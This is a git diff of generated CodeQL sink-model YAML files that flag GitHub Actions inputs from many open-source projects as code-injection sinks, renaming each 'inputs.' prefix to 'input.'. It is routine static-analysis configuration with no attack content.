.../freckle_stack-action.model.yml | 2 +- .../freeradius_freeradius-server.model.yml | 6 +-- .../composite-actions/gaphor_gaphor.model.yml | 4 +- .../getsentry_action-release.model.yml | 2 +- .../github_codeql-action.model.yml | 10 ++-- .../composite-actions/github_ruby.model.yml | 10 ++-- .../gittools_gitversion.model.yml | 6 +-- .../go-spatial_tegola.model.yml | 4 +- .../goauthentik_authentik.model.yml | 2 +- .../godotengine_godot.model.yml | 8 ++-- .../composite-actions/google_dagger.model.yml | 2 +- .../googleapis_java-cloud-bom.model.yml | 2 +- .../googleapis_sdk-platform-java.model.yml | 2 +- ...ecloudplatform_dataflowtemplates.model.yml | 2 +- ...ooglecloudplatform_magic-modules.model.yml | 2 +- .../gravitational_teleport.model.yml | 10 ++-- .../grote_transportr.model.yml | 2 +- .../hashicorp_nomad.model.yml | 2 +- .../hashicorp_terraform.model.yml | 10 ++-- .../hashicorp_vault.model.yml | 4 +- .../home-assistant_android.model.yml | 6 +-- .../homebrew_actions.model.yml | 18 +++---- ...erledger_aries-cloudagent-python.model.yml | 2 +- .../hyperledger_fabric-samples.model.yml | 6 +-- .../igniterealtime_openfire.model.yml | 6 +-- .../infracost_actions.model.yml | 2 +- ...nspektor-gadget_inspektor-gadget.model.yml | 26 +++++----- .../intel-analytics_ipex-llm.model.yml | 2 +- .../ionic-team_ionic-framework.model.yml | 22 ++++----- .../ionic-team_ionicons.model.yml | 18 +++---- .../ionic-team_stencil.model.yml | 12 ++--- .../composite-actions/ipfs_aegir.model.yml | 8 ++-- .../jetbrains_jetbrainsruntime.model.yml | 2 +- .../jhipster_generator-jhipster.model.yml | 34 ++++++------- .../jsocol_django-ratelimit.model.yml | 2 +- .../juicedata_juicefs.model.yml | 14 +++--- .../jupyter_docker-stacks.model.yml | 6 +-- .../keycloak_keycloak.model.yml | 6 +-- .../composite-actions/kserve_kserve.model.yml | 6 +-- .../kubeflow_katib.model.yml | 10 ++-- .../kubeflow_training-operator.model.yml | 2 +- .../kubernetes-sigs_karpenter.model.yml | 2 +- .../kubernetes-sigs_kwok.model.yml | 2 +- .../kubescape_kubescape.model.yml | 4 +- .../kubeshop_botkube.model.yml | 4 +- .../kyverno_kyverno.model.yml | 6 +-- .../composite-actions/lancedb_lance.model.yml | 8 ++-- .../launchdarkly_ios-client-sdk.model.yml | 2 +- .../layer5labs_meshmap-snapshot.model.yml | 12 ++--- .../ldc-developers_ldc.model.yml | 20 ++++---- .../ledgerhq_ledger-live.model.yml | 6 +-- .../composite-actions/lerna_lerna.model.yml | 2 +- .../composite-actions/lf-edge_eve.model.yml | 6 +-- .../libgit2_libgit2.model.yml | 14 +++--- .../lightning-ai_pytorch-lightning.model.yml | 16 +++---- .../lightning-ai_torchmetrics.model.yml | 6 +-- .../linkerd_linkerd2.model.yml | 8 ++-- .../logseq_publish-spa.model.yml | 8 ++-- .../macvim-dev_macvim.model.yml | 4 +- .../mamba-org_mamba.model.yml | 6 +-- .../maplibre_maplibre-native.model.yml | 22 ++++----- .../mastodon_mastodon.model.yml | 2 +- .../mavlink_qgroundcontrol.model.yml | 6 +-- .../mdanalysis_mdanalysis.model.yml | 16 +++---- .../medic_cht-core.model.yml | 6 +-- .../medusajs_medusa.model.yml | 6 +-- .../metabase_metabase.model.yml | 24 +++++----- ...etamask_action-create-release-pr.model.yml | 6 +-- .../metamask_action-npm-publish.model.yml | 2 +- .../microsoft_fluentui.model.yml | 2 +- .../microsoft_playwright.model.yml | 12 ++--- .../composite-actions/microsoft_wsl.model.yml | 4 +- .../milvus-io_milvus.model.yml | 2 +- .../composite-actions/mlflow_mlflow.model.yml | 2 +- .../modin-project_modin.model.yml | 6 +-- .../mozilla_addons-server.model.yml | 4 +- .../mozilla_bedrock.model.yml | 2 +- .../mozilla_sccache.model.yml | 2 +- .../msys2_setup-msys2.model.yml | 2 +- .../mumble-voip_mumble.model.yml | 6 +-- .../composite-actions/nasa_fprime.model.yml | 2 +- .../nats-io_nats-server.model.yml | 6 +-- ..._optic-release-automation-action.model.yml | 6 +-- .../composite-actions/nektos_act.model.yml | 14 +++--- ...4j-contrib_neo4j-apoc-procedures.model.yml | 4 +- .../neondatabase_neon.model.yml | 16 +++---- .../composite-actions/neovim_neovim.model.yml | 2 +- .../composite-actions/nhost_nhost.model.yml | 2 +- .../nix-community_nixos-wsl.model.yml | 4 +- .../composite-actions/novuhq_novu.model.yml | 2 +- .../composite-actions/nymtech_nym.model.yml | 2 +- .../obsproject_obs-studio.model.yml | 28 +++++------ .../composite-actions/ocaml_dune.model.yml | 10 ++-- .../oneflow-inc_oneflow.model.yml | 14 +++--- ...metry_opentelemetry-ruby-contrib.model.yml | 6 +-- ...pen-telemetry_opentelemetry-ruby.model.yml | 4 +- .../open-watcom_open-watcom-v2.model.yml | 6 +-- .../openapitools_openapi-generator.model.yml | 6 +-- .../composite-actions/openjdk_jdk.model.yml | 2 +- ...pensearch-project_opensearch-net.model.yml | 6 +-- .../opensearch-project_security.model.yml | 2 +- .../opentrons_opentrons.model.yml | 14 +++--- .../openvinotoolkit_openvino.model.yml | 22 ++++----- ...enzeppelin-contracts-upgradeable.model.yml | 14 +++--- ...nzeppelin_openzeppelin-contracts.model.yml | 14 +++--- .../composite-actions/oppia_oppia.model.yml | 2 +- .../composite-actions/oracle_graal.model.yml | 4 +- .../oracle_truffleruby.model.yml | 2 +- .../orhun_git-cliff.model.yml | 2 +- .../composite-actions/oven-sh_bun.model.yml | 4 +- .../owntracks_android.model.yml | 4 +- .../pandas-dev_pandas.model.yml | 6 +-- .../pardeike_harmony.model.yml | 8 ++-- .../pennylaneai_pennylane.model.yml | 4 +- .../phalcon_cphalcon.model.yml | 16 +++---- .../philosowaffle_peloton-to-garmin.model.yml | 4 +- .../composite-actions/php_php-src.model.yml | 10 ++-- .../phpdocumentor_phpdocumentor.model.yml | 4 +- ...necone-io_pinecone-python-client.model.yml | 10 ++-- .../composite-actions/pixijs_pixijs.model.yml | 2 +- .../posthog_posthog.model.yml | 4 +- .../composite-actions/primer_react.model.yml | 4 +- .../project-chip_connectedhomeip.model.yml | 6 +-- .../projectnessie_nessie.model.yml | 8 ++-- .../composite-actions/psf_black.model.yml | 2 +- .../pyca_cryptography.model.yml | 2 +- .../pyg-team_pytorch_geometric.model.yml | 6 +-- .../python-poetry_poetry.model.yml | 2 +- .../composite-actions/python_mypy.model.yml | 4 +- .../quarto-dev_quarto-cli.model.yml | 20 ++++---- .../composite-actions/quay_clair.model.yml | 12 ++--- .../quickwit-oss_quickwit.model.yml | 4 +- .../composite-actions/r-lib_actions.model.yml | 26 +++++----- .../randombit_botan.model.yml | 4 +- .../raspberrypi_documentation.model.yml | 14 +++--- .../ray-project_kuberay.model.yml | 2 +- .../readthedocs_actions.model.yml | 10 ++-- .../reflex-dev_reflex.model.yml | 2 +- .../renovatebot_renovate.model.yml | 2 +- .../rethinkdb_rethinkdb.model.yml | 8 ++-- .../composite-actions/risc0_risc0.model.yml | 8 ++-- .../rocketchat_rocket.chat.model.yml | 8 ++-- .../composite-actions/rook_rook.model.yml | 8 ++-- .../composite-actions/roots_trellis.model.yml | 2 +- .../composite-actions/ruby_debug.model.yml | 2 +- .../composite-actions/ruby_ruby.model.yml | 10 ++-- .../composite-actions/rusefi_rusefi.model.yml | 10 ++-- .../saltstack_salt.model.yml | 18 +++---- .../sap_sapmachine.model.yml | 2 +- .../scala-native_scala-native.model.yml | 4 +- .../composite-actions/scitools_iris.model.yml | 6 +-- .../scylladb_scylla-operator.model.yml | 8 ++-- .../shader-slang_slang.model.yml | 10 ++-- .../shaka-project_shaka-player.model.yml | 8 ++-- ...ode_react-webpack-rails-tutorial.model.yml | 4 +- .../simple-icons_simple-icons.model.yml | 2 +- .../slint-ui_slint.model.yml | 4 +- .../solidusio_solidus.model.yml | 8 ++-- .../composite-actions/solo-io_gloo.model.yml | 2 +- .../composite-actions/sonarr_sonarr.model.yml | 14 +++--- .../sonic-pi-net_sonic-pi.model.yml | 6 +-- .../spacedriveapp_spacedrive.model.yml | 2 +- .../spockframework_spock.model.yml | 2 +- .../spring-io_initializr.model.yml | 4 +- .../spring-io_start.spring.io.model.yml | 4 +- .../spring-projects_spring-boot.model.yml | 4 +- ...spring-projects_spring-framework.model.yml | 4 +- .../spring-projects_spring-graphql.model.yml | 4 +- .../square_workflow-kotlin.model.yml | 6 +-- .../stefanprodan_podinfo.model.yml | 4 +- .../composite-actions/stellar_go.model.yml | 2 +- .../streetsidesoftware_cspell.model.yml | 2 +- .../subquery_subql.model.yml | 2 +- .../swagger-api_swagger-codegen.model.yml | 12 ++--- .../swagger-api_swagger-parser.model.yml | 12 ++--- .../tarantool_tarantool.model.yml | 8 ++-- .../telepresenceio_telepresence.model.yml | 2 +- .../tensorflow_datasets.model.yml | 4 +- .../texstudio-org_texstudio.model.yml | 2 +- .../toeverything_affine.model.yml | 16 +++---- .../treeverse_lakefs.model.yml | 6 +-- .../trezor_trezor-firmware.model.yml | 8 ++-- .../tribler_tribler.model.yml | 10 ++-- .../trunk-io_trunk-action.model.yml | 16 +++---- .../composite-actions/unidata_metpy.model.yml | 2 +- .../unstructured-io_unstructured.model.yml | 2 +- .../composite-actions/vercel_turbo.model.yml | 2 +- .../vesoft-inc_nebula.model.yml | 14 +++--- .../composite-actions/vkcom_vkui.model.yml | 12 ++--- .../vuetifyjs_vuetify.model.yml | 8 ++-- .../wagoodman_dive.model.yml | 2 +- ...lletconnect_walletconnectswiftv2.model.yml | 16 +++---- .../composite-actions/wazuh_wazuh.model.yml | 6 +-- .../web-infra-dev_rspack.model.yml | 6 +-- .../webassembly_wabt.model.yml | 2 +- .../composite-actions/wntrblm_nox.model.yml | 2 +- .../composite-actions/xrplf_rippled.model.yml | 6 +-- .../composite-actions/zcash_zcash.model.yml | 4 +- .../zenml-io_zenml.model.yml | 2 +- .../composite-actions/zeroc-ice_ice.model.yml | 4 +- .../0xpolygon_polygon-edge.model.yml | 2 +- .../reusable-workflows/8vim_8vim.model.yml | 8 ++-- .../actions_reusable-workflows.model.yml | 12 ++--- .../reusable-workflows/adap_flower.model.yml | 6 +-- .../aio-libs_multidict.model.yml | 4 +- .../aio-libs_yarl.model.yml | 4 +- .../airbytehq_airbyte.model.yml | 2 +- .../alphagov_collections.model.yml | 2 +- .../alphagov_frontend.model.yml | 2 +- .../alphagov_publishing-api.model.yml | 2 +- .../reusable-workflows/apache_druid.model.yml | 20 ++++---- .../reusable-workflows/apache_flink.model.yml | 4 +- .../reusable-workflows/apache_spark.model.yml | 4 +- .../argilla-io_argilla.model.yml | 2 +- .../argoproj_argo-cd.model.yml | 6 +-- .../argoproj_argo-rollouts.model.yml | 6 +-- .../aws-amplify_amplify-ui.model.yml | 2 +- .../reusable-workflows/azure_apiops.model.yml | 2 +- .../azure_mlops-templates.model.yml | 16 +++---- .../bbq-beets_avocaddo-cmw.model.yml | 8 ++-- .../bbq-beets_mobile-ci-cd.model.yml | 8 ++-- .../bbq-beets_yujincat-action.model.yml | 4 +- .../bdunderscore_modular-avatar.model.yml | 2 +- .../benc-uk_workflow-dispatch.model.yml | 2 +- .../bridgecrewio_checkov.model.yml | 6 +-- .../bugsnag_bugsnag-ruby.model.yml | 2 +- ...ecodealliance_wasm-micro-runtime.model.yml | 34 ++++++------- .../celo-org_celo-blockchain.model.yml | 4 +- .../cemu-project_cemu.model.yml | 2 +- .../cesiumgs_cesium-unreal.model.yml | 48 +++++++++---------- .../reusable-workflows/cgal_cgal.model.yml | 2 +- .../checkstyle_checkstyle.model.yml | 18 +++---- .../chia-network_actions.model.yml | 4 +- .../chipsalliance_chisel.model.yml | 4 +- .../clickhouse_clickhouse.model.yml | 18 +++---- .../cloudfoundry_cli.model.yml | 2 +- .../cocotb_cocotb.model.yml | 6 +-- .../codeigniter4_codeigniter4.model.yml | 8 ++-- .../com-lihaoyi_mill.model.yml | 4 +- .../cosmos_ibc-go.model.yml | 24 +++++----- .../crowdsecurity_crowdsec.model.yml | 4 +- .../cryptomator_cryptomator.model.yml | 4 +- .../daeuniverse_dae.model.yml | 4 +- .../dafny-lang_dafny.model.yml | 8 ++-- .../dagger_dagger.model.yml | 4 +- .../dash-industry-forum_dash.js.model.yml | 4 +- .../datadog_dd-trace-go.model.yml | 2 +- .../datadog_dd-trace-py.model.yml | 4 +- .../datafuselabs_databend.model.yml | 4 +- .../dbt-labs_dbt-bigquery.model.yml | 18 +++---- .../dbt-labs_dbt-core.model.yml | 8 ++-- .../dbt-labs_dbt-snowflake.model.yml | 18 +++---- .../decidim_decidim.model.yml | 2 +- .../defectdojo_django-defectdojo.model.yml | 2 +- ...dependencytrack_dependency-track.model.yml | 2 +- .../devexpress_testcafe.model.yml | 10 ++-- .../dfhack_dfhack.model.yml | 26 +++++----- .../docker_build-push-action.model.yml | 4 +- .../dragonwell-project_dragonwell11.model.yml | 2 +- .../earthly_earthly.model.yml | 34 ++++++------- .../eclipse-vertx_vert.x.model.yml | 2 +- .../eclipse-vertx_vertx-sql-client.model.yml | 2 +- .../elastic_elasticsearch-net.model.yml | 2 +- .../element-hq_element-desktop.model.yml | 12 ++--- .../etcd-io_bbolt.model.yml | 4 +- .../reusable-workflows/etcd-io_etcd.model.yml | 8 ++-- .../eventstore_eventstore.model.yml | 4 +- .../expensify_app.model.yml | 2 +- ...xternal-secrets_external-secrets.model.yml | 4 +- .../facebook_create-react-app.model.yml | 2 +- .../facebookresearch_xformers.model.yml | 20 ++++---- .../falcosecurity_falco.model.yml | 12 ++--- .../fastify_fastify.model.yml | 2 +- .../ferretdb_ferretdb.model.yml | 2 +- .../filecoin-project_venus.model.yml | 8 ++-- .../firebase_firebase-unity-sdk.model.yml | 28 +++++------ .../flarum_framework.model.yml | 2 +- .../fluent_fluent-bit.model.yml | 16 +++---- .../flux-iac_tofu-controller.model.yml | 2 +- .../flyteorg_flyte.model.yml | 6 +-- .../foundatiofx_foundatio.model.yml | 6 +-- .../freecad_freecad.model.yml | 2 +- .../getpelican_pelican.model.yml | 6 +-- .../getporter_porter.model.yml | 2 +- .../getsentry_sentry-dart.model.yml | 4 +- .../getsentry_sentry-unity.model.yml | 4 +- .../gitpod-io_gitpod.model.yml | 2 +- .../gittools_gitversion.model.yml | 2 +- ...ooglecloudplatform_magic-modules.model.yml | 2 +- ...loudplatform_nodejs-docs-samples.model.yml | 4 +- .../gravitational_teleport.model.yml | 2 +- .../gravitl_netmaker.model.yml | 2 +- .../reusable-workflows/h2oai_wave.model.yml | 6 +-- .../hadashia_vcontainer.model.yml | 4 +- .../hashicorp_boundary.model.yml | 2 +- .../hashicorp_consul.model.yml | 4 +- .../hashicorp_terraform-cdk.model.yml | 20 ++++---- ...hashicorp_terraform-provider-tfe.model.yml | 2 +- .../hashicorp_terraform.model.yml | 8 ++-- .../hashicorp_vault.model.yml | 22 ++++----- .../reusable-workflows/heroku_cli.model.yml | 4 +- .../hitobito_hitobito.model.yml | 4 +- .../home-assistant_operating-system.model.yml | 4 +- .../homuler_mediapipeunityplugin.model.yml | 12 ++--- .../huggingface_doc-builder.model.yml | 18 +++---- .../huggingface_transformers.model.yml | 4 +- .../hyperion-project_hyperion.ng.model.yml | 6 +-- .../reusable-workflows/ibm_sarama.model.yml | 2 +- ...nloader_icloud_photos_downloader.model.yml | 2 +- .../immich-app_immich.model.yml | 2 +- .../reusable-workflows/inria_spoon.model.yml | 2 +- ...el-device-plugins-for-kubernetes.model.yml | 2 +- .../inverse-inc_packetfence.model.yml | 2 +- .../reusable-workflows/ispc_ispc.model.yml | 2 +- ..._intellij-platform-gradle-plugin.model.yml | 2 +- .../jupyter_docker-stacks.model.yml | 16 +++---- .../kairos-io_kairos.model.yml | 36 +++++++------- .../kanidm_kanidm.model.yml | 2 +- .../kata-containers_kata-containers.model.yml | 30 ++++++------ .../reusable-workflows/kiali_kiali.model.yml | 22 ++++----- .../kotest_kotest.model.yml | 2 +- .../kubernetes_ingress-nginx.model.yml | 4 +- .../kubescape_kubescape.model.yml | 8 ++-- .../kubeshop_botkube.model.yml | 4 +- .../reusable-workflows/kumahq_kuma.model.yml | 8 ++-- .../labring_sealos.model.yml | 20 ++++---- .../laion-ai_open-assistant.model.yml | 2 +- .../learningequality_kolibri.model.yml | 8 ++-- .../lensesio_stream-reactor.model.yml | 2 +- .../leptos-rs_leptos.model.yml | 6 +-- .../lightning-ai_pytorch-lightning.model.yml | 4 +- .../liquibase_liquibase.model.yml | 2 +- .../litestar-org_litestar.model.yml | 4 +- .../reusable-workflows/llvm_circt.model.yml | 16 +++---- .../lnbits_lnbits.model.yml | 2 +- .../lutris_lutris.model.yml | 2 +- .../reusable-workflows/mailu_mailu.model.yml | 6 +-- .../mamba-org_mamba.model.yml | 4 +- ...anticoresoftware_manticoresearch.model.yml | 18 +++---- .../marcelotduarte_cx_freeze.model.yml | 2 +- ...xaml_materialdesigninxamltoolkit.model.yml | 8 ++-- .../matter-labs_zksync-era.model.yml | 4 +- .../mattermost_desktop.model.yml | 2 +- .../mattermost_mattermost.model.yml | 10 ++-- .../mealie-recipes_mealie.model.yml | 2 +- .../meshery_meshery.model.yml | 22 ++++----- .../meshtastic_firmware.model.yml | 10 ++-- .../microcks_microcks.model.yml | 2 +- ...crosoft_applicationinsights-java.model.yml | 2 +- .../microsoft_chat-copilot.model.yml | 12 ++--- .../microsoft_msquic.model.yml | 26 +++++----- .../microsoft_oryx.model.yml | 2 +- .../microsoft_pr-metrics.model.yml | 2 +- ...oft_react-native-windows-samples.model.yml | 16 +++---- .../microsoft_vscode-cpptools.model.yml | 2 +- .../moby_buildkit.model.yml | 10 ++-- .../reusable-workflows/moby_moby.model.yml | 4 +- .../mosaicml_composer.model.yml | 12 ++--- .../msys2_setup-msys2.model.yml | 4 +- .../mudler_localai.model.yml | 4 +- .../mustardchef_wsabuilds.model.yml | 20 ++++---- .../reusable-workflows/n8n-io_n8n.model.yml | 2 +- .../napari_napari.model.yml | 2 +- .../reusable-workflows/nasa_fprime.model.yml | 8 ++-- .../nautobot_nautobot.model.yml | 2 +- .../reusable-workflows/nektos_act.model.yml | 16 +++---- .../neovim_neovim.model.yml | 2 +- .../nethermindeth_nethermind.model.yml | 12 ++--- .../newrelic_newrelic-dotnet-agent.model.yml | 10 ++-- .../newrelic_newrelic-java-agent.model.yml | 4 +- .../newrelic_node-newrelic.model.yml | 8 ++-- .../nexus-mods_nexusmods.app.model.yml | 8 ++-- .../nginxinc_kubernetes-ingress.model.yml | 22 ++++----- .../nocodb_nocodb.model.yml | 4 +- .../reusable-workflows/novuhq_novu.model.yml | 30 ++++++------ .../npm_abbrev-js.model.yml | 2 +- .../reusable-workflows/npm_cli.model.yml | 4 +- .../npm_fs-minipass.model.yml | 2 +- .../npm_hosted-git-info.model.yml | 2 +- .../reusable-workflows/npm_ini.model.yml | 2 +- ...pm_json-parse-even-better-errors.model.yml | 2 +- .../npm_minify-registry-metadata.model.yml | 2 +- .../npm_mute-stream.model.yml | 2 +- .../npm_node-semver.model.yml | 2 +- .../npm_node-which.model.yml | 2 +- .../reusable-workflows/npm_nopt.model.yml | 2 +- .../npm_normalize-package-data.model.yml | 2 +- .../npm_write-file-atomic.model.yml | 2 +- .../onflow_cadence.model.yml | 8 ++-- .../open-goal_jak-project.model.yml | 12 ++--- ...pen-telemetry_opentelemetry-demo.model.yml | 2 +- ...try_opentelemetry-dotnet-contrib.model.yml | 4 +- ...n-telemetry_opentelemetry-dotnet.model.yml | 4 +- ...entelemetry-java-instrumentation.model.yml | 4 +- ...lemetry_opentelemetry-js-contrib.model.yml | 2 +- ...telemetry_opentelemetry-operator.model.yml | 6 +-- .../openbao_openbao.model.yml | 12 ++--- .../openhab_openhab-docs.model.yml | 8 ++-- .../openmined_pysyft.model.yml | 4 +- .../opentofu_opentofu.model.yml | 8 ++-- .../openttd_openttd.model.yml | 24 +++++----- .../openvinotoolkit_openvino.model.yml | 2 +- .../reusable-workflows/openxla_iree.model.yml | 14 +++--- .../reusable-workflows/openzfs_zfs.model.yml | 2 +- ...ator-framework_java-operator-sdk.model.yml | 6 +-- .../orange-opensource_hurl.model.yml | 2 +- ...aolosalvatori_servicebusexplorer.model.yml | 4 +- .../parcel-bundler_parcel.model.yml | 2 +- .../pardeike_harmony.model.yml | 2 +- .../reusable-workflows/pcsx2_pcsx2.model.yml | 14 +++--- .../pennylaneai_pennylane.model.yml | 6 +-- ...necone-io_pinecone-python-client.model.yml | 2 +- .../pixie-io_pixie.model.yml | 6 +-- .../plantuml_plantuml.model.yml | 2 +- .../powerdns_pdns.model.yml | 6 +-- .../preactjs_preact.model.yml | 4 +- .../prismlauncher_prismlauncher.model.yml | 2 +- .../product-os_flowzone.model.yml | 2 +- .../project-oak_oak.model.yml | 4 +- .../reusable-workflows/prql_prql.model.yml | 2 +- .../pulumi_pulumi.model.yml | 10 ++-- .../puppetlabs_puppetlabs-puppetdb.model.yml | 6 +-- .../reusable-workflows/pyo3_maturin.model.yml | 2 +- .../reusable-workflows/pyo3_pyo3.model.yml | 2 +- .../python_cpython.model.yml | 4 +- .../pytorch_botorch.model.yml | 2 +- .../reusable-workflows/pytorch_xla.model.yml | 2 +- .../quarto-dev_quarto-cli.model.yml | 2 +- .../rancher_dashboard.model.yml | 8 ++-- .../rasterio_rasterio.model.yml | 2 +- .../redisearch_redisearch.model.yml | 2 +- .../remix-run_remix.model.yml | 2 +- .../rmcrackan_libation.model.yml | 8 ++-- .../rocketchat_rocket.chat.model.yml | 2 +- .../ruby_ruby.wasm.model.yml | 2 +- .../rustdesk_rustdesk.model.yml | 6 +-- .../saadeghi_daisyui.model.yml | 4 +- .../sagemath_sage.model.yml | 14 +++--- .../schemastore_schemastore.model.yml | 4 +- .../scikit-learn_scikit-learn.model.yml | 2 +- .../seleniumhq_selenium.model.yml | 4 +- .../shaka-project_shaka-packager.model.yml | 6 +-- .../shaka-project_shaka-player.model.yml | 8 ++-- .../shimataro_ssh-key-action.model.yml | 2 +- .../softfever_orcaslicer.model.yml | 4 +- ...-mansion_react-native-reanimated.model.yml | 2 +- .../solana-labs_solana.model.yml | 2 +- .../sonarr_sonarr.model.yml | 4 +- .../speedb-io_speedb.model.yml | 4 +- ...ring-cloud_spring-cloud-dataflow.model.yml | 2 +- .../sqlfluff_sqlfluff.model.yml | 6 +-- .../stdlib-js_stdlib.model.yml | 8 ++-- .../stereokit_stereokit.model.yml | 10 ++-- .../streetsidesoftware_cspell.model.yml | 2 +- .../supabase_auth.model.yml | 2 +- .../reusable-workflows/supabase_cli.model.yml | 2 +- .../tencent_hippy.model.yml | 8 ++-- .../tgstation_tgstation.model.yml | 6 +-- .../thesofproject_sof.model.yml | 2 +- .../tiann_kernelsu.model.yml | 6 +-- .../tiledb-inc_tiledb.model.yml | 4 +- .../toeverything_affine.model.yml | 2 +- .../tracel-ai_burn.model.yml | 2 +- .../tribler_tribler.model.yml | 2 +- .../ubisoft_sharpmake.model.yml | 4 +- .../unity-technologies_ml-agents.model.yml | 2 +- .../reusable-workflows/urbit_urbit.model.yml | 4 +- .../uyuni-project_uyuni.model.yml | 4 +- .../vert-x3_vertx-hazelcast.model.yml | 4 +- .../reusable-workflows/vkcom_vkui.model.yml | 2 +- .../walletconnect_web3modal.model.yml | 2 +- .../warzone2100_warzone2100.model.yml | 2 +- .../wasmedge_wasmedge.model.yml | 10 ++-- .../web-infra-dev_rspack.model.yml | 4 +- .../reusable-workflows/werf_werf.model.yml | 32 ++++++------- .../widdix_aws-cf-templates.model.yml | 2 +- .../wildfly_wildfly.model.yml | 8 ++-- .../yt-dlp_yt-dlp.model.yml | 12 ++--- .../zenml-io_zenml.model.yml | 6 +-- .../zephyrproject-rtos_zephyr.model.yml | 2 +- .../zitadel_zitadel.model.yml | 8 ++-- 597 files changed, 1937 insertions(+), 1937 deletions(-) diff --git a/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml b/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml index 4bc9d5ed771..877543ea8e4 100644 --- a/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml +++ b/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml @@ -3,12 +3,12 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["actions/actions-runner-controller", "*", "inputs.image-tag", "code-injection", "generated"] - - ["actions/actions-runner-controller", "*", "inputs.image-name", "code-injection", "generated"] - - ["actions/actions-runner-controller", "*", "inputs.arc-controller-namespace", "code-injection", "generated"] - - ["actions/actions-runner-controller", "*", "inputs.arc-namespace", "code-injection", "generated"] - - ["actions/actions-runner-controller", "*", "inputs.arc-name", "code-injection", "generated"] - - ["actions/actions-runner-controller", "*", "inputs.repo-name", "code-injection", "generated"] - - ["actions/actions-runner-controller", "*", "inputs.repo-owner", "code-injection", "generated"] - - ["actions/actions-runner-controller", "*", "inputs.workflow-file", "code-injection", "generated"] - - ["actions/actions-runner-controller", "*", "inputs.auth-token", "code-injection", "generated"] \ No newline at end of file + - ["actions/actions-runner-controller", "*", "input.image-tag", "code-injection", "generated"] + - ["actions/actions-runner-controller", "*", "input.image-name", "code-injection", "generated"] + - ["actions/actions-runner-controller", "*", "input.arc-controller-namespace", "code-injection", "generated"] + - ["actions/actions-runner-controller", "*", "input.arc-namespace", "code-injection", "generated"] + - ["actions/actions-runner-controller", "*", "input.arc-name", "code-injection", "generated"] + - ["actions/actions-runner-controller", "*", "input.repo-name", "code-injection", "generated"] + - ["actions/actions-runner-controller", "*", "input.repo-owner", "code-injection", "generated"] + - ["actions/actions-runner-controller", "*", "input.workflow-file", "code-injection", "generated"] + - ["actions/actions-runner-controller", "*", "input.auth-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/adap_flower.model.yml b/ql/lib/ext/generated/composite-actions/adap_flower.model.yml index 3ce17568490..1c9d4a7f6d9 100644 --- a/ql/lib/ext/generated/composite-actions/adap_flower.model.yml +++ b/ql/lib/ext/generated/composite-actions/adap_flower.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["adap/flower", "*", "inputs.poetry-version", "code-injection", "generated"] - - ["adap/flower", "*", "inputs.setuptools-version", "code-injection", "generated"] - - ["adap/flower", "*", "inputs.pip-version", "code-injection", "generated"] - - ["adap/flower", "*", "inputs.python-version", "code-injection", "generated"] \ No newline at end of file + - ["adap/flower", "*", "input.poetry-version", "code-injection", "generated"] + - ["adap/flower", "*", "input.setuptools-version", "code-injection", "generated"] + - ["adap/flower", "*", "input.pip-version", "code-injection", "generated"] + - ["adap/flower", "*", "input.python-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml b/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml index 80a23352e55..a9d65724735 100644 --- a/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml @@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["agoric/agoric-sdk", "*", "inputs.xsnap-random-init", "code-injection", "generated"] - - ["agoric/agoric-sdk", "*", "inputs.path", "code-injection", "generated"] - - ["agoric/agoric-sdk", "*", "inputs.ignore-endo-branch", "code-injection", "generated"] - - ["agoric/agoric-sdk", "*", "inputs.codecov-token", "code-injection", "generated"] - - ["agoric/agoric-sdk", "*", "inputs.datadog-token", "code-injection", "generated"] - - ["agoric/agoric-sdk", "*", "inputs.datadog-site", "code-injection", "generated"] \ No newline at end of file + - ["agoric/agoric-sdk", "*", "input.xsnap-random-init", "code-injection", "generated"] + - ["agoric/agoric-sdk", "*", "input.path", "code-injection", "generated"] + - ["agoric/agoric-sdk", "*", "input.ignore-endo-branch", "code-injection", "generated"] + - ["agoric/agoric-sdk", "*", "input.codecov-token", "code-injection", "generated"] + - ["agoric/agoric-sdk", "*", "input.datadog-token", "code-injection", "generated"] + - ["agoric/agoric-sdk", "*", "input.datadog-site", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml b/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml index 441c8ebcd52..d40014b9a12 100644 --- a/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml +++ b/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["airbnb/lottie-ios", "*", "inputs.xcode", "code-injection", "generated"] \ No newline at end of file + - ["airbnb/lottie-ios", "*", "input.xcode", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml b/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml index d4e8a2c32bf..7452ddc2187 100644 --- a/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml +++ b/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["airbytehq/airbyte", "*", "inputs.options", "code-injection", "generated"] - - ["airbytehq/airbyte", "*", "inputs.subcommand", "code-injection", "generated"] \ No newline at end of file + - ["airbytehq/airbyte", "*", "input.options", "code-injection", "generated"] + - ["airbytehq/airbyte", "*", "input.subcommand", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml b/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml index ce3ed699b9a..a91d2c7b0e5 100644 --- 